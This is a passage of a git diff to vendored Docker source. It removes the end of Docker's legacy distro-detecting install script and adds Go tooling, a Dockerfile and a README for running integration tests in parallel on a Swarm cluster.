-			dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[[:space:]]')
-
-			# Print info about upstream distro
-			cat <<-EOF
-			Upstream release is '$lsb_dist' version '$dist_version'.
-			EOF
-		else
-			if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then
-				# We're Debian and don't even know it!
-				lsb_dist=debian
-				dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')"
-				case "$dist_version" in
-					9)
-						dist_version="stretch"
-					;;
-					8|'Kali Linux 2')
-						dist_version="jessie"
-					;;
-					7)
-						dist_version="wheezy"
-					;;
-				esac
-			fi
-		fi
-	fi
-}
-
-rpm_import_repository_key() {
-	local key=$1; shift
-	local tmpdir=$(mktemp -d)
-	chmod 600 "$tmpdir"
-	for key_server in $key_servers ; do
-		gpg --homedir "$tmpdir" --keyserver "$key_server" --recv-keys "$key" && break
-	done
-	gpg --homedir "$tmpdir" -k "$key" >/dev/null
-	gpg --homedir "$tmpdir" --export --armor "$key" > "$tmpdir"/repo.key
-	rpm --import "$tmpdir"/repo.key
-	rm -rf "$tmpdir"
-}
-
-semverParse() {
-	major="${1%%.*}"
-	minor="${1#$major.}"
-	minor="${minor%%.*}"
-	patch="${1#$major.$minor.}"
-	patch="${patch%%[-.]*}"
-}
-
-do_install() {
-	architecture=$(uname -m)
-	case $architecture in
-		# officially supported
-		amd64|x86_64)
-			;;
-		# unofficially supported with available repositories
-		armv6l|armv7l)
-			;;
-		# unofficially supported without available repositories
-		aarch64|arm64|ppc64le|s390x)
-			cat 1>&2 <<-EOF
-			Error: Docker doesn't officially support $architecture and no Docker $architecture repository exists.
-			EOF
-			exit 1
-			;;
-		# not supported
-		*)
-			cat >&2 <<-EOF
-			Error: $architecture is not a recognized platform.
-			EOF
-			exit 1
-			;;
-	esac
-
-	if command_exists docker; then
-		version="$(docker -v | cut -d ' ' -f3 | cut -d ',' -f1)"
-		MAJOR_W=1
-		MINOR_W=10
-
-		semverParse $version
-
-		shouldWarn=0
-		if [ $major -lt $MAJOR_W ]; then
-			shouldWarn=1
-		fi
-
-		if [ $major -le $MAJOR_W ] && [ $minor -lt $MINOR_W ]; then
-			shouldWarn=1
-		fi
-
-		cat >&2 <<-'EOF'
-			Warning: the "docker" command appears to already exist on this system.
-
-			If you already have Docker installed, this script can cause trouble, which is
-			why we're displaying this warning and provide the opportunity to cancel the
-			installation.
-
-			If you installed the current Docker package using this script and are using it
-		EOF
-
-		if [ $shouldWarn -eq 1 ]; then
-			cat >&2 <<-'EOF'
-			again to update Docker, we urge you to migrate your image store before upgrading
-			to v1.10+.
-
-			You can find instructions for this here:
-			https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration
-			EOF
-		else
-			cat >&2 <<-'EOF'
-			again to update Docker, you can safely ignore this message.
-			EOF
-		fi
-
-		cat >&2 <<-'EOF'
-
-			You may press Ctrl+C now to abort this script.
-		EOF
-		( set -x; sleep 20 )
-	fi
-
-	user="$(id -un 2>/dev/null || true)"
-
-	sh_c='sh -c'
-	if [ "$user" != 'root' ]; then
-		if command_exists sudo; then
-			sh_c='sudo -E sh -c'
-		elif command_exists su; then
-			sh_c='su -c'
-		else
-			cat >&2 <<-'EOF'
-			Error: this installer needs the ability to run commands as root.
-			We are unable to find either "sudo" or "su" available to make this happen.
-			EOF
-			exit 1
-		fi
-	fi
-
-	curl=''
-	if command_exists curl; then
-		curl='curl -sSL'
-	elif command_exists wget; then
-		curl='wget -qO-'
-	elif command_exists busybox && busybox --list-modules | grep -q wget; then
-		curl='busybox wget -qO-'
-	fi
-
-	# check to see which repo they are trying to install from
-	if [ -z "$repo" ]; then
-		repo='main'
-		if [ "https://test.docker.com/" = "$url" ]; then
-			repo='testing'
-		elif [ "https://experimental.docker.com/" = "$url" ]; then
-			repo='experimental'
-		fi
-	fi
-
-	# perform some very rudimentary platform detection
-	lsb_dist=''
-	dist_version=''
-	if command_exists lsb_release; then
-		lsb_dist="$(lsb_release -si)"
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/lsb-release ]; then
-		lsb_dist="$(. /etc/lsb-release && echo "$DISTRIB_ID")"
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/debian_version ]; then
-		lsb_dist='debian'
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/fedora-release ]; then
-		lsb_dist='fedora'
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/oracle-release ]; then
-		lsb_dist='oracleserver'
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/centos-release ]; then
-		lsb_dist='centos'
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/redhat-release ]; then
-		lsb_dist='redhat'
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/photon-release ]; then
-		lsb_dist='photon'
-	fi
-	if [ -z "$lsb_dist" ] && [ -r /etc/os-release ]; then
-		lsb_dist="$(. /etc/os-release && echo "$ID")"
-	fi
-
-	lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')"
-
-	# Special case redhatenterpriseserver
-	if [ "${lsb_dist}" = "redhatenterpriseserver" ]; then
-        	# Set it to redhat, it will be changed to centos below anyways
-        	lsb_dist='redhat'
-	fi
-
-	case "$lsb_dist" in
-
-		ubuntu)
-			if command_exists lsb_release; then
-				dist_version="$(lsb_release --codename | cut -f2)"
-			fi
-			if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then
-				dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")"
-			fi
-		;;
-
-		debian|raspbian)
-			dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')"
-			case "$dist_version" in
-				8)
-					dist_version="jessie"
-				;;
-				7)
-					dist_version="wheezy"
-				;;
-			esac
-		;;
-
-		oracleserver)
-			# need to switch lsb_dist to match yum repo URL
-			lsb_dist="oraclelinux"
-			dist_version="$(rpm -q --whatprovides redhat-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//')"
-		;;
-
-		fedora|centos|redhat)
-			dist_version="$(rpm -q --whatprovides ${lsb_dist}-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//' | sort | tail -1)"
-		;;
-
-		"vmware photon")
-			lsb_dist="photon"
-			dist_version="$(. /etc/os-release && echo "$VERSION_ID")"
-		;;
-
-		*)
-			if command_exists lsb_release; then
-				dist_version="$(lsb_release --codename | cut -f2)"
-			fi
-			if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then
-				dist_version="$(. /etc/os-release && echo "$VERSION_ID")"
-			fi
-		;;
-
-
-	esac
-
-	# Check if this is a forked Linux distro
-	check_forked
-
-	# Run setup for each distro accordingly
-	case "$lsb_dist" in
-		ubuntu|debian|raspbian)
-			export DEBIAN_FRONTEND=noninteractive
-
-			did_apt_get_update=
-			apt_get_update() {
-				if [ -z "$did_apt_get_update" ]; then
-					( set -x; $sh_c 'sleep 3; apt-get update' )
-					did_apt_get_update=1
-				fi
-			}
-
-			if [ "$lsb_dist" != "raspbian" ]; then
-				# aufs is preferred over devicemapper; try to ensure the driver is available.
-				if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then
-					if uname -r | grep -q -- '-generic' && dpkg -l 'linux-image-*-generic' | grep -qE '^ii|^hi' 2>/dev/null; then
-						kern_extras="linux-image-extra-$(uname -r) linux-image-extra-virtual"
-
-						apt_get_update
-						( set -x; $sh_c 'sleep 3; apt-get install -y -q '"$kern_extras" ) || true
-
-						if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then
-							echo >&2 'Warning: tried to install '"$kern_extras"' (for AUFS)'
-							echo >&2 ' but we still have no AUFS.  Docker may not work. Proceeding anyways!'
-							( set -x; sleep 10 )
-						fi
-					else
-						echo >&2 'Warning: current kernel is not supported by the linux-image-extra-virtual'
-						echo >&2 ' package.  We have no AUFS support.  Consider installing the packages'
-						echo >&2 ' linux-image-virtual kernel and linux-image-extra-virtual for AUFS support.'
-						( set -x; sleep 10 )
-					fi
-				fi
-			fi
-
-			# install apparmor utils if they're missing and apparmor is enabled in the kernel
-			# otherwise Docker will fail to start
-			if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then
-				if command -v apparmor_parser >/dev/null 2>&1; then
-					echo 'apparmor is enabled in the kernel and apparmor utils were already installed'
-				else
-					echo 'apparmor is enabled in the kernel, but apparmor_parser is missing. Trying to install it..'
-					apt_get_update
-					( set -x; $sh_c 'sleep 3; apt-get install -y -q apparmor' )
-				fi
-			fi
-
-			if [ ! -e /usr/lib/apt/methods/https ]; then
-				apt_get_update
-				( set -x; $sh_c 'sleep 3; apt-get install -y -q apt-transport-https ca-certificates' )
-			fi
-			if [ -z "$curl" ]; then
-				apt_get_update
-				( set -x; $sh_c 'sleep 3; apt-get install -y -q curl ca-certificates' )
-				curl='curl -sSL'
-			fi
-			if ! command -v gpg > /dev/null; then
-				apt_get_update
-				( set -x; $sh_c 'sleep 3; apt-get install -y -q gnupg2 || apt-get install -y -q gnupg' )
-			fi
-
-			# dirmngr is a separate package in ubuntu yakkety; see https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1634464
-			if ! command -v dirmngr > /dev/null; then
-				apt_get_update
-				( set -x; $sh_c 'sleep 3; apt-get install -y -q dirmngr' )
-			fi
-
-			(
-			set -x
-			for key_server in $key_servers ; do
-				$sh_c "apt-key adv --keyserver hkp://${key_server}:80 --recv-keys ${gpg_fingerprint}" && break
-			done
-			$sh_c "apt-key adv -k ${gpg_fingerprint} >/dev/null"
-			$sh_c "mkdir -p /etc/apt/sources.list.d"
-			$sh_c "echo deb \[arch=$(dpkg --print-architecture)\] ${apt_url}/repo ${lsb_dist}-${dist_version} ${repo} > /etc/apt/sources.list.d/docker.list"
-			$sh_c 'sleep 3; apt-get update; apt-get install -y -q docker-engine'
-			)
-			echo_docker_as_nonroot
-			exit 0
-			;;
-
-		fedora|centos|redhat|oraclelinux|photon)
-			if [ "${lsb_dist}" = "redhat" ]; then
-				# we use the centos repository for both redhat and centos releases
-				lsb_dist='centos'
-			fi
-			$sh_c "cat >/etc/yum.repos.d/docker-${repo}.repo" <<-EOF
-			[docker-${repo}-repo]
-			name=Docker ${repo} Repository
-			baseurl=${yum_url}/repo/${repo}/${lsb_dist}/${dist_version}
-			enabled=1
-			gpgcheck=1
-			gpgkey=${yum_url}/gpg
-			EOF
-			if [ "$lsb_dist" = "fedora" ] && [ "$dist_version" -ge "22" ]; then
-				(
-					set -x
-					$sh_c 'sleep 3; dnf -y -q install docker-engine'
-				)
-			elif [ "$lsb_dist" = "photon" ]; then
-				(
-					set -x
-					$sh_c 'sleep 3; tdnf -y install docker-engine'
-				)
-			else
-				(
-					set -x
-					$sh_c 'sleep 3; yum -y -q install docker-engine'
-				)
-			fi
-			echo_docker_as_nonroot
-			exit 0
-			;;
-	esac
-
-	# intentionally mixed spaces and tabs here -- tabs are stripped by "<<-'EOF'", spaces are kept in the output
-	cat >&2 <<-'EOF'
-
-	  Either your platform is not easily detectable, is not supported by this
-	  installer script (yet - PRs welcome! [hack/install.sh]), or does not yet have
-	  a package for Docker.  Please visit the following URL for more detailed
-	  installation instructions:
-
-	    https://docs.docker.com/engine/installation/
-
-	EOF
-	exit 1
-}
-
-# wrapped up in a function so that we have some protection against only getting
-# half the file during "curl | sh"
-do_install
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md
new file mode 100644
index 0000000000..4f4f67d4f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md
@@ -0,0 +1,69 @@
+# Integration Testing on Swarm
+
+IT on Swarm allows you to execute integration test in parallel across a Docker Swarm cluster
+
+## Architecture
+
+### Master service
+
+  - Works as a funker caller
+  - Calls a worker funker (`-worker-service`) with a chunk of `-check.f` filter strings (passed as a file via `-input` flag, typically `/mnt/input`)
+
+### Worker service
+
+  - Works as a funker callee
+  - Executes an equivalent of `TESTFLAGS=-check.f TestFoo|TestBar|TestBaz ... make test-integration` using the bind-mounted API socket (`docker.sock`)
+
+### Client
+
+  - Controls master and workers via `docker stack`
+  - No need to have a local daemon
+
+Typically, the master and workers are supposed to be running on a cloud environment,
+while the client is supposed to be running on a laptop, e.g. Docker for Mac/Windows.
+
+## Requirement
+
+  - Docker daemon 1.13 or later
+  - Private registry for distributed execution with multiple nodes
+
+## Usage
+
+### Step 1: Prepare images
+
+    $ make build-integration-cli-on-swarm
+
+Following environment variables are known to work in this step:
+
+ - `BUILDFLAGS`
+ - `DOCKER_INCREMENTAL_BINARY`
+
+Note: during the transition into Moby Project, you might need to create a symbolic link `$GOPATH/src/github.com/docker/docker` to `$GOPATH/src/github.com/moby/moby`. 
+
+### Step 2: Execute tests
+
+    $ ./hack/integration-cli-on-swarm/integration-cli-on-swarm -replicas 40 -push-worker-image YOUR_REGISTRY.EXAMPLE.COM/integration-cli-worker:latest 
+
+Following environment variables are known to work in this step:
+
+ - `DOCKER_GRAPHDRIVER`
+ - `DOCKER_EXPERIMENTAL`
+
+#### Flags
+
+Basic flags:
+
+ - `-replicas N`: the number of worker service replicas. i.e. degree of parallelism.
+ - `-chunks N`: the number of chunks. By default, `chunks` == `replicas`.
+ - `-push-worker-image REGISTRY/IMAGE:TAG`: push the worker image to the registry. Note that if you have only single node and hence you do not need a private registry, you do not need to specify `-push-worker-image`.
+
+Experimental flags for mitigating makespan nonuniformity:
+
+ - `-shuffle`: Shuffle the test filter strings
+
+Flags for debugging IT on Swarm itself:
+
+ - `-rand-seed N`: the random seed. This flag is useful for deterministic replaying. By default(0), the timestamp is used.
+ - `-filters-file FILE`: the file contains `-check.f` strings. By default, the file is automatically generated.
+ - `-dry-run`: skip the actual workload
+ - `keep-executor`: do not auto-remove executor containers, which is used for running privileged programs on Swarm
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile
new file mode 100644
index 0000000000..1ae228f6ef
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile
@@ -0,0 +1,6 @@
+# this Dockerfile is solely used for the master image.
+# Please refer to the top-level Makefile for the worker image.
+FROM golang:1.7
+ADD . /go/src/github.com/docker/docker/hack/integration-cli-on-swarm/agent
+RUN go build -buildmode=pie -o /master github.com/docker/docker/hack/integration-cli-on-swarm/agent/master
+ENTRYPOINT ["/master"]
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go
new file mode 100644
index 0000000000..dab9c67077
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go
@@ -0,0 +1,132 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"log"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"time"
+
+	"github.com/bfirsh/funker-go"
+	"github.com/docker/docker/hack/integration-cli-on-swarm/agent/types"
+)
+
+const (
+	// funkerRetryTimeout is for the issue https://github.com/bfirsh/funker/issues/3
+	// When all the funker replicas are busy in their own job, we cannot connect to funker.
+	funkerRetryTimeout  = 1 * time.Hour
+	funkerRetryDuration = 1 * time.Second
+)
+
+// ticker is needed for some CI (e.g., on Travis, job is aborted when no output emitted for 10 minutes)
+func ticker(d time.Duration) chan struct{} {
+	t := time.NewTicker(d)
+	stop := make(chan struct{})
+	go func() {
+		for {
+			select {
+			case <-t.C:
+				log.Printf("tick (just for keeping CI job active) per %s", d.String())
+			case <-stop:
+				t.Stop()
+			}
+		}
+	}()
+	return stop
+}
+
+func executeTests(funkerName string, testChunks [][]string) error {
+	tickerStopper := ticker(9*time.Minute + 55*time.Second)
+	defer func() {
+		close(tickerStopper)
+	}()
+	begin := time.Now()
+	log.Printf("Executing %d chunks in parallel, against %q", len(testChunks), funkerName)
+	var wg sync.WaitGroup
+	var passed, failed uint32
+	for chunkID, tests := range testChunks {
+		log.Printf("Executing chunk %d (contains %d test filters)", chunkID, len(tests))
+		wg.Add(1)
+		go func(chunkID int, tests []string) {
+			defer wg.Done()
+			chunkBegin := time.Now()
+			result, err := executeTestChunkWithRetry(funkerName, types.Args{
+				ChunkID: chunkID,
+				Tests:   tests,
+			})
+			if result.RawLog != "" {
+				for _, s := range strings.Split(result.RawLog, "\n") {
+					log.Printf("Log (chunk %d): %s", chunkID, s)
+				}
+			}
+			if err != nil {
+				log.Printf("Error while executing chunk %d: %v",
+					chunkID, err)
+				atomic.AddUint32(&failed, 1)
+			} else {
+				if result.Code == 0 {
+					atomic.AddUint32(&passed, 1)
+				} else {
+					atomic.AddUint32(&failed, 1)
+				}
+				log.Printf("Finished chunk %d [%d/%d] with %d test filters in %s, code=%d.",
+					chunkID, passed+failed, len(testChunks), len(tests),
+					time.Since(chunkBegin), result.Code)
+			}
+		}(chunkID, tests)
+	}
+	wg.Wait()
+	// TODO: print actual tests rather than chunks
+	log.Printf("Executed %d chunks in %s. PASS: %d, FAIL: %d.",
+		len(testChunks), time.Since(begin), passed, failed)
+	if failed > 0 {
+		return fmt.Errorf("%d chunks failed", failed)
+	}
+	return nil
+}
+
+func executeTestChunk(funkerName string, args types.Args) (types.Result, error) {
+	ret, err := funker.Call(funkerName, args)
+	if err != nil {
+		return types.Result{}, err
+	}
+	tmp, err := json.Marshal(ret)
+	if err != nil {
+		return types.Result{}, err
+	}
+	var result types.Result
+	err = json.Unmarshal(tmp, &result)
+	return result, err
+}
+
+func executeTestChunkWithRetry(funkerName string, args types.Args) (types.Result, error) {
+	begin := time.Now()
+	for i := 0; time.Since(begin) < funkerRetryTimeout; i++ {
+		result, err := executeTestChunk(funkerName, args)
+		if err == nil {
+			log.Printf("executeTestChunk(%q, %d) returned code %d in trial %d", funkerName, args.ChunkID, result.Code, i)
+			return result, nil
+		}
+		if errorSeemsInteresting(err) {
+			log.Printf("Error while calling executeTestChunk(%q, %d), will retry (trial %d): %v",
+				funkerName, args.ChunkID, i, err)
+		}
+		// TODO: non-constant sleep
+		time.Sleep(funkerRetryDuration)
+	}
+	return types.Result{}, fmt.Errorf("could not call executeTestChunk(%q, %d) in %v", funkerName, args.ChunkID, funkerRetryTimeout)
+}
+
+//  errorSeemsInteresting returns true if err does not seem about https://github.com/bfirsh/funker/issues/3
+func errorSeemsInteresting(err error) bool {
+	boringSubstrs := []string{"connection refused", "connection reset by peer", "no such host", "transport endpoint is not connected", "no route to host"}
+	errS := err.Error()
+	for _, boringS := range boringSubstrs {
+		if strings.Contains(errS, boringS) {
+			return false
+		}
+	}
+	return true
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go
new file mode 100644
index 0000000000..a0d9a0d381
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go
@@ -0,0 +1,65 @@
+package main
+
+import (
+	"errors"
+	"flag"
+	"io/ioutil"
+	"log"
+	"strings"
+)
+
+func main() {
+	if err := xmain(); err != nil {
+		log.Fatalf("fatal error: %v", err)
+	}
+}
+
+func xmain() error {
+	workerService := flag.String("worker-service", "", "Name of worker service")
+	chunks := flag.Int("chunks", 0, "Number of chunks")
+	input := flag.String("input", "", "Path to input file")
+	randSeed := flag.Int64("rand-seed", int64(0), "Random seed")
+	shuffle := flag.Bool("shuffle", false, "Shuffle the input so as to mitigate makespan nonuniformity")
+	flag.Parse()
+	if *workerService == "" {
+		return errors.New("worker-service unset")
+	}
+	if *chunks == 0 {
+		return errors.New("chunks unset")
+	}
+	if *input == "" {
+		return errors.New("input unset")
+	}
+
+	tests, err := loadTests(*input)
+	if err != nil {
+		return err
+	}
+	testChunks := chunkTests(tests, *chunks, *shuffle, *randSeed)
+	log.Printf("Loaded %d tests (%d chunks)", len(tests), len(testChunks))
+	return executeTests(*workerService, testChunks)
+}
+
+func chunkTests(tests []string, numChunks int, shuffle bool, randSeed int64) [][]string {
+	// shuffling (experimental) mitigates makespan nonuniformity
+	// Not sure this can cause some locality problem..
+	if shuffle {
+		shuffleStrings(tests, randSeed)
+	}
+	return chunkStrings(tests, numChunks)
+}
+
+func loadTests(filename string) ([]string, error) {
+	b, err := ioutil.ReadFile(filename)
+	if err != nil {
+		return nil, err
+	}
+	var tests []string
+	for _, line := range strings.Split(string(b), "\n") {
+		s := strings.TrimSpace(line)
+		if s != "" {
+			tests = append(tests, s)
+		}
+	}
+	return tests, nil
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go
new file mode 100644
index 0000000000..d28c41da7f
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go
@@ -0,0 +1,28 @@
+package main
+
+import (
+	"math/rand"
+)
+
+// chunkStrings chunks the string slice
+func chunkStrings(x []string, numChunks int) [][]string {
+	var result [][]string
+	chunkSize := (len(x) + numChunks - 1) / numChunks
+	for i := 0; i < len(x); i += chunkSize {
+		ub := i + chunkSize
+		if ub > len(x) {
+			ub = len(x)
+		}
+		result = append(result, x[i:ub])
+	}
+	return result
+}
+
+// shuffleStrings shuffles strings
+func shuffleStrings(x []string, seed int64) {
+	r := rand.New(rand.NewSource(seed))
+	for i := range x {
+		j := r.Intn(i + 1)
+		x[i], x[j] = x[j], x[i]
+	}
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go
new file mode 100644
index 0000000000..c172562b1b
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go
@@ -0,0 +1,63 @@
+package main
+
+import (
+	"fmt"
+	"reflect"
+	"testing"
+	"time"
+)
+
+func generateInput(inputLen int) []string {
+	var input []string
+	for i := 0; i < inputLen; i++ {
+		input = append(input, fmt.Sprintf("s%d", i))
+	}
+
+	return input
+}
+
+func testChunkStrings(t *testing.T, inputLen, numChunks int) {
+	t.Logf("inputLen=%d, numChunks=%d", inputLen, numChunks)
+	input := generateInput(inputLen)
+	result := chunkStrings(input, numChunks)
+	t.Logf("result has %d chunks", len(result))
+	var inputReconstructedFromResult []string
+	for i, chunk := range result {
+		t.Logf("chunk %d has %d elements", i, len(chunk))
+		inputReconstructedFromResult = append(inputReconstructedFromResult, chunk...)
+	}
+	if !reflect.DeepEqual(input, inputReconstructedFromResult) {
+		t.Fatal("input != inputReconstructedFromResult")
+	}
+}
+
+func TestChunkStrings_4_4(t *testing.T) {
+	testChunkStrings(t, 4, 4)
+}
+
+func TestChunkStrings_4_1(t *testing.T) {
+	testChunkStrings(t, 4, 1)
+}
+
+func TestChunkStrings_1_4(t *testing.T) {
+	testChunkStrings(t, 1, 4)
+}
+
+func TestChunkStrings_1000_8(t *testing.T) {
+	testChunkStrings(t, 1000, 8)
+}
+
+func TestChunkStrings_1000_9(t *testing.T) {
+	testChunkStrings(t, 1000, 9)
+}
+
+func testShuffleStrings(t *testing.T, inputLen int, seed int64) {
+	t.Logf("inputLen=%d, seed=%d", inputLen, seed)
+	x := generateInput(inputLen)
+	shuffleStrings(x, seed)
+	t.Logf("shuffled: %v", x)
+}
+
+func TestShuffleStrings_100(t *testing.T) {
+	testShuffleStrings(t, 100, time.Now().UnixNano())
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go
new file mode 100644
index 0000000000..fc598f0330
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go
@@ -0,0 +1,18 @@
+package types
+
+// Args is the type for funker args
+type Args struct {
+	// ChunkID is an unique number of the chunk
+	ChunkID int `json:"chunk_id"`
+	// Tests is the set of the strings that are passed as `-check.f` filters
+	Tests []string `json:"tests"`
+}
+
+// Result is the type for funker result
+type Result struct {
+	// ChunkID corresponds to Args.ChunkID
+	ChunkID int `json:"chunk_id"`
+	// Code is the exit code
+	Code   int    `json:"code"`
+	RawLog string `json:"raw_log"`
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf
new file mode 100644
index 0000000000..efd6d6d049
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf
@@ -0,0 +1,2 @@
+# dependencies specific to worker (i.e. github.com/docker/docker/...) are not vendored here
+github.com/bfirsh/funker-go eaa0a2e06f30e72c9a0b7f858951e581e26ef773
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go
new file mode 100644
index 0000000000..eef80d461e
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go
@@ -0,0 +1,118 @@
+package main
+
+import (
+	"bytes"
+	"context"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/stdcopy"
+)
+
+// testChunkExecutor executes integration-cli binary.
+// image needs to be the worker image itself. testFlags are OR-set of regexp for filtering tests.
+type testChunkExecutor func(image string, tests []string) (int64, string, error)
+
+func dryTestChunkExecutor() testChunkExecutor {
+	return func(image string, tests []string) (int64, string, error) {
+		return 0, fmt.Sprintf("DRY RUN (image=%q, tests=%v)", image, tests), nil
+	}
+}
+
+// privilegedTestChunkExecutor invokes a privileged container from the worker
+// service via bind-mounted API socket so as to execute the test chunk
+func privilegedTestChunkExecutor(autoRemove bool) testChunkExecutor {
+	return func(image string, tests []string) (int64, string, error) {
+		cli, err := client.NewEnvClient()
+		if err != nil {
+			return 0, "", err
+		}
+		// propagate variables from the host (needs to be defined in the compose file)
+		experimental := os.Getenv("DOCKER_EXPERIMENTAL")
+		graphdriver := os.Getenv("DOCKER_GRAPHDRIVER")
+		if graphdriver == "" {
+			info, err := cli.Info(context.Background())
+			if err != nil {
+				return 0, "", err
+			}
+			graphdriver = info.Driver
+		}
+		// `daemon_dest` is similar to `$DEST` (e.g. `bundles/VERSION/test-integration`)
+		// but it exists outside of `bundles` so as to make `$DOCKER_GRAPHDRIVER` work.
+		//
+		// Without this hack, `$DOCKER_GRAPHDRIVER` fails because of (e.g.) `overlay2 is not supported over overlayfs`
+		//
+		// see integration-cli/daemon/daemon.go
+		daemonDest := "/daemon_dest"
+		config := container.Config{
+			Image: image,
+			Env: []string{
+				"TESTFLAGS=-check.f " + strings.Join(tests, "|"),
+				"KEEPBUNDLE=1",
+				"DOCKER_INTEGRATION_TESTS_VERIFIED=1", // for avoiding rebuilding integration-cli
+				"DOCKER_EXPERIMENTAL=" + experimental,
+				"DOCKER_GRAPHDRIVER=" + graphdriver,
+				"DOCKER_INTEGRATION_DAEMON_DEST=" + daemonDest,
+			},
+			Labels: map[string]string{
+				"org.dockerproject.integration-cli-on-swarm":         "",
+				"org.dockerproject.integration-cli-on-swarm.comment": "this non-service container is created for running privileged programs on Swarm. you can remove this container manually if the corresponding service is already stopped.",
+			},
+			Entrypoint: []string{"hack/dind"},
+			Cmd:        []string{"hack/make.sh", "test-integration"},
+		}
+		hostConfig := container.HostConfig{
+			AutoRemove: autoRemove,
+			Privileged: true,
+			Mounts: []mount.Mount{
+				{
+					Type:   mount.TypeVolume,
+					Target: daemonDest,
+				},
+			},
+		}
+		id, stream, err := runContainer(context.Background(), cli, config, hostConfig)
+		if err != nil {
+			return 0, "", err
+		}
+		var b bytes.Buffer
+		teeContainerStream(&b, os.Stdout, os.Stderr, stream)
+		resultC, errC := cli.ContainerWait(context.Background(), id, "")
+		select {
+		case err := <-errC:
+			return 0, "", err
+		case result := <-resultC:
+			return result.StatusCode, b.String(), nil
+		}
+	}
+}
+
+func runContainer(ctx context.Context, cli *client.Client, config container.Config, hostConfig container.HostConfig) (string, io.ReadCloser, error) {
+	created, err := cli.ContainerCreate(context.Background(),
+		&config, &hostConfig, nil, "")
+	if err != nil {
+		return "", nil, err
+	}
+	if err = cli.ContainerStart(ctx, created.ID, types.ContainerStartOptions{}); err != nil {
+		return "", nil, err
+	}
+	stream, err := cli.ContainerLogs(ctx,
+		created.ID,
+		types.ContainerLogsOptions{
+			ShowStdout: true,
+			ShowStderr: true,
+			Follow:     true,
+		})
+	return created.ID, stream, err
+}
+
+func teeContainerStream(w, stdout, stderr io.Writer, stream io.ReadCloser) {
+	stdcopy.StdCopy(io.MultiWriter(w, stdout), io.MultiWriter(w, stderr), stream)
+	stream.Close()
+}
diff --git a/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go
new file mode 100644
index 0000000000..ea8bb3fe27
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go
@@ -0,0 +1,69 @@
+package main
+
+import (
+	"flag"
+	"fmt"
+	"log"
+	"time"
+
+	"github.com/bfirsh/funker-go"
+	"github.com/docker/distribution/reference"
